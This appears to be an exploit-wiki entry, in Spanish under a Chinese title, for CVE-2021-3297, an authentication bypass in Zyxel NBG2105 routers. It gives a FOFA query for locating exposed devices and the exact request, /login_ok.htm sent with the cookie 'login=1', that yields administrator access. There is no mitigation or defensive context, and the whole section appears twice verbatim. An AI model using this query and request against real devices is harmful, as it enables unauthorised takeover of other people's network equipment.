CVE-2021-3297_Zyxel_NBG2105_身份驗證繞過漏洞

# CVE-2021-3297 Zyxel NBG2105 身份驗證繞過漏洞/es

== Impacto de la vulnerabilidad ==

Zyxel NBG2105

==FOFA==

app="ZyXEL-NBG2105"

![](/static/pwnwiki/img/Xnip2021-04-06 09-32-28.jpg)

El archivo de front-end /js/util_gw.js tiene la verificación de front-end del parámetro Cookie login.

Si solicita lo siguiente, será redirigido a la página home.htm como administrador.


http://xxx.xxx.xxx.xxx/login_ok.htm

Cookie: login=1;

![](/static/pwnwiki/img/Xnip2021-04-06_09-36-42.jpg )

== Impacto de la vulnerabilidad ==

Zyxel NBG2105

==FOFA==

app="ZyXEL-NBG2105"

![](/static/pwnwiki/img/Xnip2021-04-06 09-32-28.jpg)

El archivo de front-end /js/util_gw.js tiene la verificación de front-end del parámetro Cookie login.

Si solicita lo siguiente, será redirigido a la página home.htm como administrador.


http://xxx.xxx.xxx.xxx/login_ok.htm

Cookie: login=1;

![](/static/pwnwiki/img/Xnip2021-04-06_09-36-42.jpg )

文章版权归作者所有，未经允许请勿转载。

THE END

CVE-2021-3297_Zyxel_NBG2105_身份驗證繞過漏洞_es